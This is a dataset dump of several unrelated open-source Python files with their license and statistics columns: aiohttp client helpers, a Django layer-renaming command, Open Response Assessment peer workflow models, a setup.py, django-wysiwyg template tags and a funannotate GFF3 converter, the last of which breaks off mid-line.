if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
if exc_type is not None:
self._resp.close()
else:
yield from self._resp.release()
class _WSRequestContextManager(_BaseRequestContextManager):
if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
yield from self._resp.close()
class _DetachedRequestContextManager(_RequestContextManager):
__slots__ = _RequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
@asyncio.coroutine
def __iter__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
if PY_35:
def __await__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
def __del__(self):
self._session.detach()
class _DetachedWSRequestContextManager(_WSRequestContextManager):
__slots__ = _WSRequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
def __del__(self):
self._session.detach()
def request(method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
cookies=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
connector=None,
loop=None,
read_until_eof=True,
request_class=None,
response_class=None):
"""Constructs and sends a request. Returns response object.
:param str method: HTTP method
:param str url: request url
:param params: (optional) Dictionary or bytes to be sent in the query
string of the new request
:param data: (optional) Dictionary, bytes, or file-like object to
send in the body of the request
:param dict headers: (optional) Dictionary of HTTP Headers to send with
the request
:param dict cookies: (optional) Dict object to send with the request
:param auth: (optional) BasicAuth named tuple represent HTTP Basic Auth
:type auth: aiohttp.helpers.BasicAuth
:param bool allow_redirects: (optional) If set to False, do not follow
redirects
:param version: Request HTTP version.
:type version: aiohttp.protocol.HttpVersion
:param bool compress: Set to True if request has to be compressed
with deflate encoding.
:param chunked: Set to chunk size for chunked transfer encoding.
:type chunked: bool or int
:param bool expect100: Expect 100-continue response from server.
:param connector: BaseConnector sub-class instance to support
connection pooling.
:type connector: aiohttp.connector.BaseConnector
:param bool read_until_eof: Read response until eof if response
does not have Content-Length header.
:param request_class: (optional) Custom Request class implementation.
:param response_class: (optional) Custom Response class implementation.
:param loop: Optional event loop.
Usage::
>>> import aiohttp
>>> resp = yield from aiohttp.request('GET', 'http://python.org/')
>>> resp
<ClientResponse(python.org/) [200]>
>>> data = yield from resp.read()
"""
warnings.warn("Use ClientSession().request() instead", DeprecationWarning)
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
kwargs = {}
if request_class is not None:
kwargs['request_class'] = request_class
if response_class is not None:
kwargs['response_class'] = response_class
session = ClientSession(loop=loop,
cookies=cookies,
connector=connector,
**kwargs)
return _DetachedRequestContextManager(
session._request(method, url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof),
session=session)
def get(url, **kwargs):
warnings.warn("Use ClientSession().get() instead", DeprecationWarning)
return request(hdrs.METH_GET, url, **kwargs)
def options(url, **kwargs):
warnings.warn("Use ClientSession().options() instead", DeprecationWarning)
return request(hdrs.METH_OPTIONS, url, **kwargs)
def head(url, **kwargs):
warnings.warn("Use ClientSession().head() instead", DeprecationWarning)
return request(hdrs.METH_HEAD, url, **kwargs)
def post(url, **kwargs):
warnings.warn("Use ClientSession().post() instead", DeprecationWarning)
return request(hdrs.METH_POST, url, **kwargs)
def put(url, **kwargs):
warnings.warn("Use ClientSession().put() instead", DeprecationWarning)
return request(hdrs.METH_PUT, url, **kwargs)
def patch(url, **kwargs):
warnings.warn("Use ClientSession().patch() instead", DeprecationWarning)
return request(hdrs.METH_PATCH, url, **kwargs)
def delete(url, **kwargs):
warnings.warn("Use ClientSession().delete() instead", DeprecationWarning)
return request(hdrs.METH_DELETE, url, **kwargs)
def ws_connect(url, *, protocols=(), timeout=10.0, connector=None, auth=None,
ws_response_class=ClientWebSocketResponse, autoclose=True,
autoping=True, loop=None, origin=None, headers=None):
warnings.warn("Use ClientSession().ws_connect() instead",
DeprecationWarning)
if loop is None:
loop = asyncio.get_event_loop()
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
session = aiohttp.ClientSession(loop=loop, connector=connector, auth=auth,
ws_response_class=ws_response_class,
headers=headers)
return _DetachedWSRequestContextManager(
session._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
origin=origin),
session=session)
|
apache-2.0
| -5,988,827,585,146,491,000 | 32.456464 | 79 | 0.536199 | false | 4.763336 | false | false | false |
opennewzealand/linz2osm
|
linz2osm/data_dict/management/commands/update_layer_names.py
|
1
|
4626
|
# LINZ-2-OSM
# Copyright (C) Koordinates Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.db import transaction, connection, connections
from linz2osm.data_dict.models import Layer, LayerInDataset, Dataset, Tag
RENAMES = {
'breakwtr_cl': 'breakwater_cl',
'cattlstp_pnt': 'cattlestop_pnt',
'cblwy_ind_cl': 'cableway_industrial_cl',
'cblwy_peo_cl': 'cableway_people_cl',
'descrip_text': 'descriptive_text',
'dredg_tl_cl': 'dredge_tailing_cl',
'embankmnt_cl': 'embankment_cl',
'ferry_cr_cl': 'ferry_crossing_cl',
'fish_fm_poly': 'fish_farm_poly',
'floodgte_pnt': 'floodgate_pnt',
'gas_val_pnt': 'gas_valve_pnt',
'geo_name': 'geographic_name',
'gl_lake_poly': 'glacial_lake_poly',
'golf_crs_pnt': 'golf_course_pnt',
'golf_crs_poly': 'golf_course_poly',
'grav_pit_poly': 'gravel_pit_poly',
'hist_ste_pnt': 'historic_site_pnt',
'ice_clf_edge': 'ice_cliff_edge',
'ice_strm_cl': 'ice_stream_pnt',
'marne_fm_cl': 'marine_farm_cl',
'marne_fm_poly': 'marine_farm_poly',
'melt_strm_cl': 'melt_stream_cl',
'moran_wl_poly': 'moraine_wall_poly',
'pumce_pt_poly': 'pumice_pit_poly',
'racetrk_cl': 'racetrack_cl',
'racetrk_pnt': 'racetrack_pnt',
'racetrk_poly': 'racetrack_poly',
'radar_dm_pnt': 'radar_dome_pnt',
'rail_stn_pnt': 'rail_station_pnt',
'reservr_poly': 'reservoir_poly',
'res_area_poly': 'residential_area_poly',
'rifle_rg_poly': 'rifle_range_poly',
'rock_out_pnt': 'rock_outcrop_pnt',
'sat_stn_pnt': 'satellite_station_pnt',
'scatscrb_poly': 'scattered_scrub_poly',
'shelt_blt_cl': 'shelter_belt_cl',
'showgrd_poly': 'showground_poly',
'spillwy_edge': 'spillway_edge',
'sprtfld_poly': 'sportsfield_poly',
'telephn_cl': 'telephone_cl',
'waterfal_edg': 'waterfall_edge',
'waterfal_cl': 'waterfall_cl',
'waterfal_pnt': 'waterfall_pnt',
'waterfal_poly': 'waterfall_poly',
'water_r_cl': 'water_race_cl',
}
class Command(BaseCommand):
help = "Rename layers with old abbreviated names"
def handle(self, **options):
# drop existing layers with new names: only needed if you've run dd_load
# before update_layer_names
# for new_name in RENAMES.values():
# for l in Layer.objects.filter(name=new_name):
# l.delete()
with transaction.commit_on_success():
cursor = connection.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE data_dict_layer SET name = %s WHERE name = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_tag SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_layerindataset SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
print 'CONNECTION: default'
for q in connection.queries:
print q['sql']
# the actual layers
for conn_name in connections:
if conn_name != 'default':
conn = connections[conn_name]
with transaction.commit_on_success():
cursor = conn.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s;", [new_name, old_name])
cursor.execute("SELECT 1 FROM pg_tables WHERE schemaname='public' AND tablename=%s;", [old_name])
old_table_exists = cursor.fetchall()
if old_table_exists:
print "In %s renaming %s to %s" % (conn_name, old_name, new_name)
cursor.execute("ALTER TABLE %s RENAME TO %s;" % (old_name, new_name))
print 'CONNECTION: %s' % (conn_name,)
for q in conn.queries:
print q['sql']
|
gpl-3.0
| 9,209,304,426,773,775,000 | 42.641509 | 134 | 0.610463 | false | 3.138399 | false | false | false |
kmnk/gitn
|
rplugin/python3/denite/source/gitn_log.py
|
1
|
5421
|
# File: gitn_log.py
# Author: kmnk <kmnknmk at gmail.com>
# License: MIT license
from gitn.enum import Window
from gitn.util.gitn import Gitn
from denite.process import Process
import os
import re
import time
from .gitn import Source as Base
DATE_GRAPH_HIGHLIGHT = {
'container': {
'name': 'gitnLog_dateGraphHeader',
'pattern': '\\v((\d{4}\/\d{2}\/\d{2} \d{2}:\d{2} )| {16} )[*|\/\-\ ]+',
},
'containees': [
{
'name': 'gitnLog_date',
'pattern': '\\v\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}',
'color': 'Comment',
'next': 'gitnLog_graph',
},
{
'name': 'gitnLog_graph',
'pattern': '\\v[*|\/\-\\ ]+',
'color': 'Statement',
},
],
}
AUTHOR_NAME_HIGHLIGHT = {
'container': {
'name': 'gitnLog_authorNameHeader',
'pattern': '\\v:[^:]+: ',
},
'containees': [
{
'name': 'gitnLog_separator',
'pattern': '\\v:',
'color': 'Comment',
},
{
'name': 'gitnLog_authorName',
'pattern': '\\v[^:]+',
'color': 'Type',
},
],
}
class Source(Base):
def __init__(self, vim):
super().__init__(vim)
self.name = 'gitn_log'
self.kind = 'gitn_log'
self.vars = {
'command': ['git'],
'action': ['log'],
'default_opts': [
'--date=default',
'--graph',
'--pretty=format:":::%H:::%P:::%an:::%ae:::%ad:::%at:::%cn:::%ce:::%cd:::%ct:::%s:::"',
],
'separator': ['--'],
'file': [],
'window': 'tab',
}
def on_init(self, context):
self.__proc = None
if len(context['args']) >= 1:
self.vars['file'] = [context['args'][0]]
else:
self.vars['file'] = []
if len(context['args']) >= 2:
if Window.has(context['args'][1]):
self.vars['window'] = context['args'][1]
else:
self.vars['window'] = 'tab'
def on_close(self, context):
if self.__proc:
self.__proc.kill()
self.__proc = None
def highlight(self):
Gitn.highlight(self.vim, DATE_GRAPH_HIGHLIGHT)
Gitn.highlight(self.vim, AUTHOR_NAME_HIGHLIGHT)
def define_syntax(self):
self.vim.command(
'syntax region ' + self.syntax_name + ' start=// end=/$/ '
'contains=gitnLog_dateGraphHeader,gitnLog_authorNameHeader,deniteMathced contained')
def gather_candidates(self, context):
if self.__proc:
return self.__async_gather_candidates(context, 0.5)
commands = []
commands += self.vars['command']
commands += self.vars['action']
commands += self.vars['default_opts']
commands += self.vars['separator']
commands += self.vars['file']
self.__proc = Process(commands, context, self.vim.call('expand', context['path']))
return self.__async_gather_candidates(context, 2.0)
def __async_gather_candidates(self, context, timeout):
outs, errs = self.__proc.communicate(timeout=timeout)
context['is_async'] = not self.__proc.eof()
if self.__proc.eof():
self.__proc = None
candidates = []
for line in outs:
result = self.__parse(line)
if result:
if 'subject' in result and result['subject'] != '':
candidates.append({
'word': '{0} {1}: {2} : {3}'.format(
time.strftime('%Y/%m/%d %H:%M', time.gmtime(result['author']['time'])),
result['graph'],
result['author']['name'],
result['subject'],
),
'action__log': result,
'action__path': context['args'][0] if len(context['args']) >= 1 else '',
'action__window': self.vars['window'],
})
elif 'graph' in result:
candidates.append({
'word': ' {0}'.format(result['graph'].strip()),
})
return candidates
def __parse(self, line):
m = re.search(r'^([*|/\\ ]+)\s?(.+)?$', line)
[graph, value] = m.groups()
if not m or not m.group(2): return { 'graph': graph }
splited = value.split(':::')
if len(splited) <= 1: return { 'graph': graph }
[own_hash, parent_hash, author_name, author_email, author_date, author_time, committer_name, committer_email, committer_date, committer_time, subject] = splited[1:-1]
return {
'graph': graph,
'subject': subject,
'hash': {
'own': own_hash,
'parent': parent_hash,
},
'author': {
'name': author_name,
'email': author_email,
'date': author_date,
'time': int(author_time, 10),
},
'committer': {
'name': committer_name,
'email': committer_email,
'date': committer_date,
'time': int(committer_time, 10),
},
}
|
mit
| 632,974,363,430,759,600 | 29.455056 | 174 | 0.448072 | false | 3.855619 | false | false | false |
Lektorium-LLC/edx-ora2
|
openassessment/assessment/models/peer.py
|
1
|
18730
|
"""
Django models specific to peer assessment.
NOTE: We've switched to migrations, so if you make any edits to this file, you
need to then generate a matching migration for it using:
./manage.py schemamigration openassessment.assessment --auto
"""
import random
from datetime import timedelta
from django.db import models, DatabaseError
from django.utils.timezone import now
from openassessment.assessment.models.base import Assessment
from openassessment.assessment.errors import PeerAssessmentWorkflowError, PeerAssessmentInternalError
import logging
logger = logging.getLogger("openassessment.assessment.models")
class AssessmentFeedbackOption(models.Model):
"""
Option a student can select to provide feedback on the feedback they received.
`AssessmentFeedback` stands in a one-to-many relationship with `AssessmentFeedbackOption`s:
a student can select zero or more `AssessmentFeedbackOption`s when providing feedback.
Over time, we may decide to add, delete, or reword assessment feedback options.
To preserve data integrity, we will always get-or-create `AssessmentFeedbackOption`s
based on the option text.
"""
text = models.CharField(max_length=255, unique=True)
class Meta:
app_label = "assessment"
def __unicode__(self):
return u'"{}"'.format(self.text)
class AssessmentFeedback(models.Model):
"""
Feedback on feedback. When students receive their grades, they
can provide feedback on how they were assessed, to be reviewed by course staff.
This consists of free-form written feedback
("Please provide any thoughts or comments on the feedback you received from your peers")
as well as zero or more feedback options
("Please select the statements below that reflect what you think of this peer grading experience")
"""
MAXSIZE = 1024 * 100 # 100KB
submission_uuid = models.CharField(max_length=128, unique=True, db_index=True)
assessments = models.ManyToManyField(Assessment, related_name='assessment_feedback', default=None)
feedback_text = models.TextField(max_length=10000, default="")
options = models.ManyToManyField(AssessmentFeedbackOption, related_name='assessment_feedback', default=None)
class Meta:
app_label = "assessment"
def add_options(self, selected_options):
"""
Select feedback options for this assessment.
Students can select zero or more options.
Note: you *must* save the model before calling this method.
Args:
option_text_list (list of unicode): List of options that the user selected.
Raises:
DatabaseError
"""
# First, retrieve options that already exist
options = list(AssessmentFeedbackOption.objects.filter(text__in=selected_options))
# If there are additional options that do not yet exist, create them
new_options = [text for text in selected_options if text not in [opt.text for opt in options]]
for new_option_text in new_options:
options.append(AssessmentFeedbackOption.objects.create(text=new_option_text))
# Add all options to the feedback model
# Note that we've already saved each of the AssessmentFeedbackOption models, so they have primary keys
# (required for adding to a many-to-many relationship)
self.options.add(*options) # pylint:disable=E1101
class PeerWorkflow(models.Model):
"""Internal Model for tracking Peer Assessment Workflow
This model can be used to determine the following information required
throughout the Peer Assessment Workflow:
1) Get next submission that requires assessment.
2) Does a submission have enough assessments?
3) Has a student completed enough assessments?
4) Does a student already have a submission open for assessment?
5) Close open assessments when completed.
6) Should 'over grading' be allowed for a submission?
The student item is the author of the submission. Peer Workflow Items are
created for each assessment made by this student.
"""
# Amount of time before a lease on a submission expires
TIME_LIMIT = timedelta(hours=8)
student_id = models.CharField(max_length=40, db_index=True)
item_id = models.CharField(max_length=128, db_index=True)
course_id = models.CharField(max_length=255, db_index=True)
submission_uuid = models.CharField(max_length=128, db_index=True, unique=True)
created_at = models.DateTimeField(default=now, db_index=True)
completed_at = models.DateTimeField(null=True, db_index=True)
grading_completed_at = models.DateTimeField(null=True, db_index=True)
cancelled_at = models.DateTimeField(null=True, db_index=True)
class Meta:
ordering = ["created_at", "id"]
app_label = "assessment"
@property
def is_cancelled(self):
"""
Check if workflow is cancelled.
Returns:
True/False
"""
return bool(self.cancelled_at)
@classmethod
def get_by_submission_uuid(cls, submission_uuid):
"""
Retrieve the Peer Workflow associated with the given submission UUID.
Args:
submission_uuid (str): The string representation of the UUID belonging
to the associated Peer Workflow.
Returns:
workflow (PeerWorkflow): The most recent peer workflow associated with
this submission UUID.
Raises:
PeerAssessmentWorkflowError: Thrown when no workflow can be found for
the associated submission UUID. This should always exist before a
student is allow to request submissions for peer assessment.
Examples:
>>> PeerWorkflow.get_workflow_by_submission_uuid("abc123")
{
'student_id': u'Bob',
'item_id': u'type_one',
'course_id': u'course_1',
'submission_uuid': u'1',
'created_at': datetime.datetime(2014, 1, 29, 17, 14, 52, 668850, tzinfo=<UTC>)
}
"""
try:
return cls.objects.get(submission_uuid=submission_uuid)
except cls.DoesNotExist:
return None
except DatabaseError:
error_message = (
u"Error finding workflow for submission UUID {}. Workflow must be "
u"created for submission before beginning peer assessment."
).format(submission_uuid)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
@classmethod
def create_item(cls, scorer_workflow, submission_uuid):
"""
Create a new peer workflow for a student item and submission.
Args:
scorer_workflow (PeerWorkflow): The peer workflow associated with the scorer.
submission_uuid (str): The submission associated with this workflow.
Raises:
PeerAssessmentInternalError: Raised when there is an internal error
creating the Workflow.
"""
peer_workflow = cls.get_by_submission_uuid(submission_uuid)
try:
workflow_items = PeerWorkflowItem.objects.filter(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
if len(workflow_items) > 0:
item = workflow_items[0]
else:
item = PeerWorkflowItem.objects.create(
scorer=scorer_workflow,
author=peer_workflow,
submission_uuid=submission_uuid
)
item.started_at = now()
item.save()
return item
except DatabaseError:
error_message = (
u"An internal error occurred while creating a new peer workflow "
u"item for workflow {}"
).format(scorer_workflow)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def find_active_assessments(self):
"""Given a student item, return an active assessment if one is found.
Before retrieving a new submission for a peer assessor, check to see if that
assessor already has a submission out for assessment. If an unfinished
assessment is found that has not expired or has not been cancelled,
return the associated submission.
TODO: If a user begins an assessment, then resubmits, this will never find
the unfinished assessment. Is this OK?
Args:
workflow (PeerWorkflow): See if there is an associated active assessment
for this PeerWorkflow.
Returns:
(PeerWorkflowItem) The PeerWorkflowItem for the submission that the
student has open for active assessment.
"""
oldest_acceptable = now() - self.TIME_LIMIT
items = list(self.graded.all().select_related('author').order_by("-started_at", "-id"))
valid_open_items = []
completed_sub_uuids = []
# First, remove all completed items.
for item in items:
if item.assessment is not None or item.author.is_cancelled:
completed_sub_uuids.append(item.submission_uuid)
else:
valid_open_items.append(item)
# Remove any open items which have a submission which has been completed.
for item in valid_open_items:
if (item.started_at < oldest_acceptable or
item.submission_uuid in completed_sub_uuids):
valid_open_items.remove(item)
return valid_open_items[0] if valid_open_items else None
def get_submission_for_review(self, graded_by):
"""
Find a submission for peer assessment. This function will find the next
submission that requires assessment, excluding any submission that has been
completely graded, or is actively being reviewed by other students.
Args:
graded_by (unicode): Student ID of the scorer.
Returns:
submission_uuid (str): The submission_uuid for the submission to review.
Raises:
PeerAssessmentInternalError: Raised when there is an error retrieving
the workflows or workflow items for this request.
"""
timeout = (now() - self.TIME_LIMIT).strftime("%Y-%m-%d %H:%M:%S")
# The follow query behaves as the Peer Assessment Queue. This will
# find the next submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Does not have enough completed assessments
# 3) Is not something you have already scored.
# 4) Does not have a combination of completed assessments or open
# assessments equal to or more than the requirement.
# 5) Has not been cancelled.
try:
peer_workflows = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where pw.item_id=%s "
"and pw.course_id=%s "
"and pw.student_id<>%s "
"and pw.grading_completed_at is NULL "
"and pw.cancelled_at is NULL "
"and pw.id not in ("
" select pwi.author_id "
" from assessment_peerworkflowitem pwi "
" where pwi.scorer_id=%s "
" and pwi.assessment_id is not NULL "
") "
"and ("
" select count(pwi.id) as c "
" from assessment_peerworkflowitem pwi "
" where pwi.author_id=pw.id "
" and (pwi.assessment_id is not NULL or pwi.started_at > %s) "
") < %s "
"order by pw.created_at, pw.id "
"limit 1; ",
[
self.item_id,
self.course_id,
self.student_id,
self.id,
timeout,
graded_by
]
))
if not peer_workflows:
return None
return peer_workflows[0].submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def get_submission_for_over_grading(self):
"""
Retrieve the next submission uuid for over grading in peer assessment.
"""
# The follow query behaves as the Peer Assessment Over Grading Queue. This
# will find a random submission (via PeerWorkflow) in this course / question
# that:
# 1) Does not belong to you
# 2) Is not something you have already scored
# 3) Has not been cancelled.
try:
query = list(PeerWorkflow.objects.raw(
"select pw.id, pw.submission_uuid "
"from assessment_peerworkflow pw "
"where course_id=%s "
"and item_id=%s "
"and student_id<>%s "
"and pw.cancelled_at is NULL "
"and pw.id not in ( "
"select pwi.author_id "
"from assessment_peerworkflowitem pwi "
"where pwi.scorer_id=%s"
"); ",
[self.course_id, self.item_id, self.student_id, self.id]
))
workflow_count = len(query)
if workflow_count < 1:
return None
random_int = random.randint(0, workflow_count - 1)
random_workflow = query[random_int]
return random_workflow.submission_uuid
except DatabaseError:
error_message = (
u"An internal error occurred while retrieving a peer submission "
u"for learner {}"
).format(self)
logger.exception(error_message)
raise PeerAssessmentInternalError(error_message)
def close_active_assessment(self, submission_uuid, assessment, num_required_grades):
"""
Updates a workflow item on the student's workflow with the associated
assessment. When a workflow item has an assessment, it is considered
finished.
Args:
submission_uuid (str): The submission the scorer is grading.
assessment (PeerAssessment): The associate assessment for this action.
graded_by (int): The required number of grades the peer workflow
requires to be considered complete.
Returns:
None
"""
try:
item_query = self.graded.filter(
submission_uuid=submission_uuid
).order_by("-started_at", "-id") # pylint:disable=E1101
items = list(item_query[:1])
if not items:
msg = (
u"No open assessment was found for learner {} while assessing "
u"submission UUID {}."
).format(self.student_id, submission_uuid)
raise PeerAssessmentWorkflowError(msg)
item = items[0]
item.assessment = assessment
item.save()
if (
not item.author.grading_completed_at and
item.author.graded_by.filter(assessment__isnull=False).count() >= num_required_grades
):
item.author.grading_completed_at = now()
item.author.save()
except (DatabaseError, PeerWorkflowItem.DoesNotExist):
error_message = (
u"An internal error occurred while retrieving a workflow item for "
u"learner {}. Workflow Items are created when submissions are "
u"pulled for assessment."
).format(self.student_id)
logger.exception(error_message)
raise PeerAssessmentWorkflowError(error_message)
def num_peers_graded(self):
"""
Returns the number of peers the student owning the workflow has graded.
Returns:
integer
"""
return self.graded.filter(assessment__isnull=False).count() # pylint:disable=E1101
def __repr__(self):
return (
"PeerWorkflow(student_id={0.student_id}, item_id={0.item_id}, "
"course_id={0.course_id}, submission_uuid={0.submission_uuid}"
"created_at={0.created_at}, completed_at={0.completed_at})"
).format(self)
def __unicode__(self):
return repr(self)
class PeerWorkflowItem(models.Model):
"""Represents an assessment associated with a particular workflow
Created every time a submission is requested for peer assessment. The
associated workflow represents the scorer of the given submission, and the
assessment represents the completed assessment for this work item.
"""
scorer = models.ForeignKey(PeerWorkflow, related_name='graded')
author = models.ForeignKey(PeerWorkflow, related_name='graded_by')
submission_uuid = models.CharField(max_length=128, db_index=True)
started_at = models.DateTimeField(default=now, db_index=True)
assessment = models.ForeignKey(Assessment, null=True)
# This WorkflowItem was used to determine the final score for the Workflow.
scored = models.BooleanField(default=False)
@classmethod
def get_scored_assessments(cls, submission_uuid):
"""
Return all scored assessments for a given submission.
Args:
submission_uuid (str): The UUID of the submission.
Returns:
QuerySet of Assessment objects.
"""
return Assessment.objects.filter(
pk__in=[
item.assessment.pk for item in PeerWorkflowItem.objects.filter(
submission_uuid=submission_uuid, scored=True
)
]
)
class Meta:
ordering = ["started_at", "id"]
app_label = "assessment"
def __repr__(self):
return (
"PeerWorkflowItem(scorer={0.scorer}, author={0.author}, "
"submission_uuid={0.submission_uuid}, "
"started_at={0.started_at}, assessment={0.assessment}, "
"scored={0.scored})"
).format(self)
def __unicode__(self):
return repr(self)
|
agpl-3.0
| 7,839,245,104,259,075,000 | 37.778468 | 112 | 0.609557 | false | 4.553854 | false | false | false |
yoshrote/valid_model
|
setup.py
|
1
|
1048
|
from setuptools import setup, find_packages
setup(name='valid_model',
version='0.4.0',
description="Generic data modeling and validation",
long_description="""\
""",
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='',
author='Joshua Forman',
author_email='[email protected]',
url='https://github.com/yoshrote/valid_model',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=[
'six'
],
entry_points="""
# -*- Entry points: -*-
""",
)
|
mit
| -5,580,786,748,296,095,000 | 31.75 | 72 | 0.542939 | false | 4.295082 | false | true | false |
saydulk/django-wysiwyg
|
django_wysiwyg/templatetags/wysiwyg.py
|
1
|
2413
|
from django import template
from django.conf import settings
from django.template.loader import render_to_string
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
register = template.Library()
def get_settings():
"""Utility function to retrieve settings.py values with defaults"""
flavor = getattr(settings, "DJANGO_WYSIWYG_FLAVOR", "yui")
return {
"DJANGO_WYSIWYG_MEDIA_URL": getattr(settings, "DJANGO_WYSIWYG_MEDIA_URL", urljoin(settings.STATIC_URL, flavor) + '/'),
"DJANGO_WYSIWYG_FLAVOR": flavor,
}
@register.simple_tag
def wysiwyg_setup(protocol="http"):
"""
Create the <style> and <script> tags needed to initialize the rich text editor.
Create a local django_wysiwyg/includes.html template if you don't want to use Yahoo's CDN
"""
ctx = {
"protocol": protocol,
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/includes.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
@register.simple_tag
def wysiwyg_editor(field_id, editor_name=None, config=None):
"""
Turn the textarea #field_id into a rich editor. If you do not specify the
JavaScript name of the editor, it will be derived from the field_id.
If you don't specify the editor_name then you'll have a JavaScript object
named "<field_id>_editor" in the global namespace. We give you control of
this in case you have a complex JS ctxironment.
"""
if not editor_name:
editor_name = "%s_editor" % field_id
ctx = {
'field_id': field_id,
'editor_name': editor_name,
'config': config
}
ctx.update(get_settings())
return render_to_string(
"django_wysiwyg/%s/editor_instance.html" % ctx['DJANGO_WYSIWYG_FLAVOR'],
ctx
)
@register.simple_tag
def wysiwyg_static_url(appname, prefix, default_path):
"""
Automatically use an prefix if a given application is installed.
For example, if django-ckeditor is installed, use it's STATIC_URL/ckeditor folder to find the CKEditor distribution.
When the application does not available, fallback to the default path.
This is a function for the internal templates of *django-wysiwyg*.
"""
if appname in settings.INSTALLED_APPS:
return urljoin(settings.STATIC_URL, prefix)
else:
return default_path
|
mit
| -7,762,174,823,449,520,000 | 28.790123 | 126 | 0.675508 | false | 3.569527 | false | false | false |
nextgenusfs/funannotate
|
funannotate/utilities/stringtie2gff3.py
|
1
|
3977
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import argparse
import funannotate.library as lib
def dict2gff3(input):
from collections import OrderedDict
'''
function to convert funannotate gene dictionary to gff3 output
'''
def _sortDict(d):
return (d[1]['contig'], d[1]['location'][0])
# sort the annotations by contig and start location
sGenes = sorted(iter(input.items()), key=_sortDict)
sortedGenes = OrderedDict(sGenes)
# then loop through and write GFF3 format
sys.stdout.write("##gff-version 3\n")
for k, v in list(sortedGenes.items()):
sys.stdout.write("{:}\t{:}\tgene\t{:}\t{:}\t.\t{:}\t.\tID={:};\n".format(
v['contig'], v['source'], v['location'][0], v['location'][1], v['strand'], k))
for i in range(0, len(v['ids'])):
# build extra annotations for each transcript if applicable
# now write mRNA feature
sys.stdout.write("{:}\t{:}\t{:}\t{:}\t{:}\t.\t{:}\t.\tID={:};Parent={:};TPM={:}\n".format(
v['contig'], v['source'], v['type'], v['location'][0], v['location'][1], v['strand'], v['ids'][i], k, v['tpm'][i]))
if v['type'] == 'mRNA':
if '5UTR' in v:
# if 5'UTR then write those first
num_5utrs = len(v['5UTR'][i])
if num_5utrs > 0:
for z in range(0, num_5utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tfive_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr5p{:};Parent={:};\n".format(
v['contig'], v['source'], v['5UTR'][i][z][0], v['5UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
# write the exons
num_exons = len(v['mRNA'][i])
for x in range(0, num_exons):
ex_num = x + 1
sys.stdout.write("{:}\t{:}\texon\t{:}\t{:}\t.\t{:}\t.\tID={:}.exon{:};Parent={:};\n".format(
v['contig'], v['source'], v['mRNA'][i][x][0], v['mRNA'][i][x][1], v['strand'], v['ids'][i], ex_num, v['ids'][i]))
# if 3'UTR then write
if '3UTR' in v:
num_3utrs = len(v['3UTR'][i])
if num_3utrs > 0:
for z in range(0, num_3utrs):
u_num = z + 1
sys.stdout.write("{:}\t{:}\tthree_prime_UTR\t{:}\t{:}\t.\t{:}\t.\tID={:}.utr3p{:};Parent={:};\n".format(
v['contig'], v['source'], v['3UTR'][i][z][0], v['3UTR'][i][z][1], v['strand'], v['ids'][i], u_num, v['ids'][i]))
if v['type'] == 'mRNA':
num_cds = len(v['CDS'][i])
# GFF3 phase is 1 less than flat file
current_phase = v['codon_start'][i] - 1
for y in range(0, num_cds):
sys.stdout.write("{:}\t{:}\tCDS\t{:}\t{:}\t.\t{:}\t{:}\tID={:}.cds;Parent={:};\n".format(
